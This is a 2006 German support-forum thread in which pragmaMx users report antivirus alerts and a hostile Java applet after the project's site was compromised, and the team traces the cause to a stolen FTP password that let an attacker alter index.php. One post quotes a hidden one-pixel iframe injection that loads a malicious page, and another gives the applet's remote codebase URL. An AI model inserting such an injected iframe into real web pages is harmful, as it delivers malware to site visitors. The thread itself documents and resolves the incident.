|
|
| maverik
Gast
|
|
« am: 21 Dezember 2006, 09:16:49 »
|
|
hallo und guten morgen,
ich hatte gerade eine lustige meldung meines antivirenprogrammes als ich pragma öffnete. Diese meldung bekam ich vor wochen schon einmal. ich mache mir da keine großartigen gedanken drum und schiebe es mal auf die übernervosität meines nod32.
trotzdem möchte ich es euch einmal zeigen.
so long maverik
[gelöscht durch Administrator]
|
|
|
Gespeichert |
|
|
|
|
|
| Metal-Overdrive
|
|
« Antworten #1 am: 21 Dezember 2006, 09:57:10 »
|
|
So eine ähnliche Meldung hat mir Kaspersky vor ein paar Tagen auch rausgehauen.
|
|
|
Gespeichert |
CMS-Version: pragmaMx 0.1.10, 1.30.2.13/2008-02-02
Serverdaten: MySql: 5.0.45 - PHP: 5.2.6 auf Apache-Server - Gehostet @ all-inkl.com
Projekt: wiesenfete.de
|
|
|
|
|
| smartmusic
|
|
« Antworten #2 am: 21 Dezember 2006, 10:00:07 »
|
|
ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten.
|
|
|
Gespeichert |
|
|
|
|
|
| jubilee
Gast
|
|
« Antworten #3 am: 21 Dezember 2006, 11:24:06 »
|
|
ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten
Tatsächlich wird da irgendetwas geladen.
Muss mal nachsehen woher das kommt. Scheint jedenfalls nicht von dieser Seite zu kommen.
Evt. von einem verlinkten Teil oder Script
Dump classloader list ...
codebase=http://65.254.37.58/manual/mod/s/, key=http://65.254.37.58/manual/mod/s/,crtdcghcn.jar, zombie=true, cache=true, refcount=0, info=sun.plugin.ClassLoaderInfo@12cc95d
Search results for: 65.254.37.58
OrgName: Global Net Access, LLC
OrgID: GNAL-2
Address: 55 Marietta St, NW
Address: Suite 1720
City: Atlanta
StateProv: GA
PostalCode: 30303
Country: US
ReferralServer: rwhois://rwhois.gnax.net:4321
NetRange: 65.254.32.0 - 65.254.63.255
CIDR: 65.254.32.0/19
NetName: GNAXNET
NetHandle: NET-65-254-32-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.GNAX.NET
NameServer: DNS2.GNAX.NET
Comment:
RegDate: 2003-12-29
Updated: 2004-03-31
OrgAbuseHandle: ABUSE745-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-404-230-9150
OrgAbuseEmail: abuse@gnax.net
OrgTechHandle: ENGIN7-ARIN
OrgTechName: Engineering
OrgTechPhone: +1-404-230-9150
OrgTechEmail: engineering@gnax.net
# ARIN WHOIS database, last updated 2006-12-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
|
|
|
Gespeichert |
|
|
|
|
|
| maverik
Gast
|
|
« Antworten #4 am: 21 Dezember 2006, 11:32:19 »
|
|
na dann scheint mein nod32 doch keine para´s zu haben, wenn da wirklich was im busch ist
3 40 ms 40 ms 39 ms 217.0.73.186
4 46 ms 51 ms 52 ms f-eb5.F.DE.net.DTAG.DE [62.154.17.62]
5 46 ms 46 ms 47 ms 62.156.139.10
6 47 ms 46 ms 46 ms ffm-bb1-link.telia.net [80.91.249.138]
7 64 ms 57 ms 64 ms ldn-bb2-link.telia.net [80.91.249.12]
8 132 ms 64 ms 132 ms nyk-bb2-pos7-0-0.telia.net [213.248.65.210]
9 144 ms 141 ms 144 ms ash-bb1-link.telia.net [80.91.250.17]
10 140 ms 151 ms 150 ms atl-bb1-link.telia.net [213.248.80.142]
11 152 ms 152 ms 152 ms atl-bb1-link.telia.net [213.248.80.142]
12 154 ms 153 ms 274 ms globalnet-103907-atl-bb1.c.telia.net [213.248.90.54]
13 152 ms 152 ms 155 ms 209.51.131.29
14 154 ms 154 ms 155 ms 209.51.149.109
15 152 ms 155 ms 152 ms thebesthomeloans.net [65.254.37.58]
Ablaufverfolgung beendet.
so long
|
|
|
Gespeichert |
|
|
|
|
|
| jubilee
Gast
|
|
« Antworten #5 am: 21 Dezember 2006, 11:43:16 »
|
|
Hmmm ...
Ich kanns aber nicht mehr provozieren ?!
Habt ihr den Fehler jetzt noch ?
|
|
|
Gespeichert |
|
|
|
|
|
| maverik
Gast
|
|
« Antworten #6 am: 21 Dezember 2006, 12:12:33 »
|
|
hiho
das ist insgesamt erst 2 mal bei mir aufgetauscht, so im letzten halben jahr, lässt sich auch leider nicht reproduzieren
mal abwarten ob noch mehr ähnliches verhalten haben
so long maverik
|
|
|
Gespeichert |
|
|
|
|
|
| FrankySZ
|
|
« Antworten #7 am: 21 Dezember 2006, 12:46:19 »
|
|
Hi @ll,
hab zwar keine Meldung von meinem Kaspersky bekommen, aber dafuer meckert mein NoScript-Addon fuer FF seit ca. 2tagen rum ... da ich das script nicht erlaubt hab, daher wohl auch keine Meldung von Kaspersky
btw wenn man die 65.254.37.58 im Browser aufruft kommt man zu ner Site die einem sagt dass man cpanel installiert hat ....
|
|
|
Gespeichert |
greets Franky
|
|
|
|
|
| smartmusic
|
|
« Antworten #8 am: 21 Dezember 2006, 13:11:24 »
|
|
also nun bekomme ich immer hinweise von firefox bezüglich sexseiten und spuren hinterlassen
und es lädt irgendwas nach
de.drivecleaner.com
yahoo.com
|
|
|
Gespeichert |
|
|
|
|
|
| Oscar175
|
|
« Antworten #9 am: 21 Dezember 2006, 13:30:30 »
|
|
Hallo ich hatte eben gerade "Applet BaaaaBaa started"
|
|
|
Gespeichert |
|
|
|
|
|
| maverik
Gast
|
|
« Antworten #10 am: 21 Dezember 2006, 13:38:27 »
|
|
ok wo wir grad mal bei den ungereimtheiten sind, seamonkey liefert das
was das denn fürn cookie
[gelöscht durch Administrator]
|
|
|
Gespeichert |
|
|
|
|
|
| maverik
Gast
|
|
« Antworten #11 am: 21 Dezember 2006, 13:52:58 »
|
|
ie7
[gelöscht durch Administrator]
|
|
|
Gespeichert |
|
|
|
|
|
| spike
|
|
« Antworten #12 am: 21 Dezember 2006, 14:05:13 »
|
|
das mit dem applet baabaaa startet hatte ich auch gerade...
|
|
|
Gespeichert |
|
|
|
|
|
| jubilee
Gast
|
|
« Antworten #13 am: 21 Dezember 2006, 14:11:25 »
|
|
applet baabaaa
Jo, auch verseucht.
|
|
|
Gespeichert |
|
|
|
|
|
| cihan
|
|
« Antworten #14 am: 21 Dezember 2006, 14:12:36 »
|
|
gestern habe ich auch eine warnung von nav bekommen... in dem moment war ich auf pragmam... habe gar nicht daran gedacht, dass das von pragmam kommt... danach habe ich eine fehlermeldung bekommen, nachdem die seite erstmal sehr langsam wurde... gerade ist die seite wieder sehr langsam geworden, anschliessend wieder die fehlermeldung... nach dem ausblenden des fehlers dauert ein wenig, bis die seite wieder normal läuft.
[gelöscht durch Administrator]
|
|
|
Gespeichert |
|
|
|
|
|
| Metal-Overdrive
|
|
« Antworten #15 am: 21 Dezember 2006, 14:19:31 »
|
|
Ich hatte das Problem mit dem IE7. Wollte ein ActiveX Steuerelement installieren. Bisher aber nur 1x in den letzten 3 Tagen aufgetreten. Welche Meldung Kaspersky genau rausgegeben hat weiß ich nicht mehr.
|
|
|
Gespeichert |
CMS-Version: pragmaMx 0.1.10, 1.30.2.13/2008-02-02
Serverdaten: MySql: 5.0.45 - PHP: 5.2.6 auf Apache-Server - Gehostet @ all-inkl.com
Projekt: wiesenfete.de
|
|
|
|
|
| GerhardSt
|
|
« Antworten #16 am: 21 Dezember 2006, 18:52:33 »
|
|
Hallo, bei mir wollte der IE7 gestern auch ein ActiveX Steuerelement installieren um diese Seite richtig darzustellen. Ich schaue diese Seite auf drei verschiedenen Rechnern an, nur diese Meldung bekam ich nur gestern auf einen, obwohl auf allen XP mit IE7 läuft.
|
|
|
Gespeichert |
CMS-Version: pragmaMx 0.1.11, 1.30.2.19/2008-07-19
PHP-Version: 5.2.6
MySQL-Version: 4.1.22-standard
Server-Version: Apache
IE 7 oder Firefox
|
|
|
|
|
| tuningcar
|
|
« Antworten #17 am: 21 Dezember 2006, 20:01:42 »
|
|
Das selbe Problem hatte ich vor drei Wochen auch auf meiner Tuning Seite
Durch irgendein Sicherheitsloch hatt so ein w... mir in vielen index.html Seiten folgenden Iframe eingefügt :
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
Durch den Aufruf dieser Seite in dem Iframe kommt mann zu den Troyaner
|
|
|
Gespeichert |
|
|
|
|
|
| NeMeSiSX2LC
|
|
« Antworten #18 am: 21 Dezember 2006, 23:03:21 »
|
|
Hatte ich noch nicht... Aberwird bald auch der Fall sein... Weil es stehen sehr komische Referrere drin....
|
|
|
Gespeichert |
CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1
|
|
|
|
|
doggie
öfter hier

Offline
Beiträge: 44
|
|
« Antworten #19 am: 21 Dezember 2006, 23:31:30 »
|
|
da krieg man ja die Panik
gerade eben hat sich der firefox verabschiedet und eine sexseite hat sich geöffnet.
|
|
|
Gespeichert |
|
|
|
|
|
| jubilee
Gast
|
|
« Antworten #20 am: 21 Dezember 2006, 23:34:14 »
|
|
gerade eben hat sich der firefox verabschiedet und eine sexseite hat sich geöffnet.
Also, auf unserer Seite ist das Problem bereits seit mehreren Stunden behoben.
Wir werden dazu aber noch etwas schreiben.
MfG
|
|
|
Gespeichert |
|
|
|
|
|
| spike
|
|
« Antworten #21 am: 21 Dezember 2006, 23:35:00 »
|
|
hmmm ok nun steht hier recht viel drin.. weiss den nun einer , was sache ist ?
|
|
|
Gespeichert |
|
|
|
|
|
| maverik
Gast
|
|
« Antworten #22 am: 21 Dezember 2006, 23:37:20 »
|
|
moin
coole sache, hätte gar nicht gedacht das die meldung so einen kreis zieht, hatte eher an einen zu stramm eingestellten nod32 bei mir gedacht
Wir werden dazu aber noch etwas schreiben.
na darauf bin ich gespannt
guts nächtle
maverik
|
|
|
Gespeichert |
|
|
|
|
|
| der_luecke
|
|
« Antworten #23 am: 21 Dezember 2006, 23:54:20 »
|
|
wenn wir uns nicht intensiv um unsere Seiten kümmern. Es gab vor einigen Wochen ein kleines Loch in unserem FTP-Server. Das hat sich gleich einer zu Nutze gemacht und wollte uns fürchterlichst quälen. Dieses Loch ist sehr schnell gestopft worden und wir fühlten uns wieder sicher.
Sollte man nicht, denn wir hatten im 0.1.9.er Stress vergessen, unsere alten Passworte zu ändern. Ganz schlechte Idee, denn der/die oder das böse Knabe/Junge/Mädchen/Nase wollte sich hier weiter austoben und den Effekt habt ihr hier gesehen.
Wir wollen uns bei euch bedanken, dass ihr sofort reagiert habt und uns auf diesen Fehler hingewiesen habt. So konnten wir das Schlimmste verhindern.
Euer PragmaMx-Team
|
|
|
Gespeichert |
Grüsse
Olaf
Kein Support über Mail, (ungefragter) PN oder ICQ, ausschließlich direkt im Forum!
Das ich so was mal schreiben muss;-)
|
|
|
|
|
| Atze
|
|
« Antworten #24 am: 22 Dezember 2006, 13:22:49 »
|
|
Hi,
ich glaub das habe ich auch das Problem. Meine User klagen zumindest: http://www.partyblick.de/modules.php?name=eBoard&file=viewthread&tid=4280&page=1#pid73392
und selbst habe ich das Problem auch gehabt. Das hat der Antivirus gemeldet:
C:Dokumente und EinstellungenAtzeAnwendungsdatenSunJavaDeployment cachejavapiv1.0jarcrtdcghc n.jar-311fe5cb-778e61e4.zip
Virusname:
T*/Cla***ader.*.4
Hab die Datei einfach löschen lassen.
Bis jetzt ging alles ohne Probleme.
Aber bei den anderen ist es immer noch??
Ist aber erst seit dem Update auf das neue Java, könnte es damit zusammenhängen?
Gruß
edit by Andi: Virusname unkenntlich gemacht
|
|
| « Letzte Änderung: 05 Januar 2007, 15:25:26 von Andi » |
Gespeichert |
Fahr mal das Becks hoch!
|
|
|
|
|
| GerhardSt
|
|
« Antworten #25 am: 22 Dezember 2006, 13:48:14 »
|
|
Hallo Olaf,
wenn ich das hier so lese, haben einige das Problem auch auf Ihrer Seite. Dies ist bei mir zum Glück, noch nicht der Fall.
wenn wir uns nicht intensiv um unsere Seiten kümmern. Es gab vor einigen Wochen ein kleines Loch in unserem FTP-Server. Das hat sich gleich einer zu Nutze gemacht und wollte uns fürchterlichst quälen. Dieses Loch ist sehr schnell gestopft worden und wir fühlten uns wieder sicher.
Kann es sein das durch dieses Loch, auch eure Download´s verändert worden sind, oder sind die wo anders gespeichert?
Gruß Gerhard!
Schöne Feiertage!
|
|
| « Letzte Änderung: 22 Dezember 2006, 13:52:30 von GerhardSt » |
Gespeichert |
CMS-Version: pragmaMx 0.1.11, 1.30.2.19/2008-07-19
PHP-Version: 5.2.6
MySQL-Version: 4.1.22-standard
Server-Version: Apache
IE 7 oder Firefox
|
|
|
|
|
| Musicman75
|
|
« Antworten #26 am: 22 Dezember 2006, 14:02:11 »
|
|
@ Atze
Es kommt immer noch die Virenmeldung auf deiner Seite. Nur zur Info.
|
|
|
Gespeichert |
Unaufgeforderte Support PMs & Emails werden ignoriert
Immer erst die Boardsuche verwenden und gegebenenfalls einen neuen Threat eröffnen, wenn das Problem noch nicht behandelt wurde!
|
|
|
|
|
| Andi
|
|
« Antworten #27 am: 22 Dezember 2006, 14:08:20 »
|
|
Moin
haben einige das Problem auch auf Ihrer Seite.
Wer noch, ausser Atze? Das bei tuningcar ist was anderes.
Kann es sein das durch dieses Loch, auch eure Download´s verändert worden sind, oder sind die wo anders gespeichert?
Sehr unwahrscheinlich, die wichtigsten Downloads liegen bei Sourceforge.
Jetzt bitte nicht wild rum spekulieren. Bei Atze ist der selbe FTP-Server aktiv wie bei uns, also dürfte er das selbe Problem haben wie wir. Auch der HTML-Quelltext seiner Seite zeigt das gleiche Symptom.
Grundsätzlich bei solchen Verdachten, auf der eigenen Seite, sollte zuerst die Versionsüberwachung aufgerufen werden. Dort sieht man meist sofort, wenn irgendeine .php oder .js Datei die zu pragmaMx gehören verändert wurden.
Bei uns war es die index.php, die verändert wurde, Das System wurde komplett überprüft, sonst ist da nix...
War auch schön im FTP-Logfile zu sehen, wie und was da passiert ist....
Atze, wende dich mal per PM an mich oder Jubilee.
Den Thread schliesse ich jetzt, das Thema ist soweit erledigt.
|
|
|
Gespeichert |
schön´s Grüssle, Andi
Kein Support über PN, Mail oder ICQ!
Bitte die Fragen im Forum stellen, nur so helfen die Antworten auch den anderen Usern.
Bitte auch die Boardsuche nicht vergessen, oft ist genau dein Problem schon an anderer Stelle gelöst worden!
Auch aus Steinen, die einem in den Weg gelegt werden, kann man Schönes bauen.
Johann Wolfgang von Goethe
|
|
|
|